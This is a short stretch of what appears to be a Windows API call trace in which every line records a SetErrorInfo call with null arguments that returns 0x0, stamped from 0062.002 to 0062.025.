[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.002] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.003] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.004] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.005] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.006] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.007] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.008] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.010] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.011] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.012] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.014] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.015] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.016] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.017] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.018] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.021] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.022] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.023] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.024] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
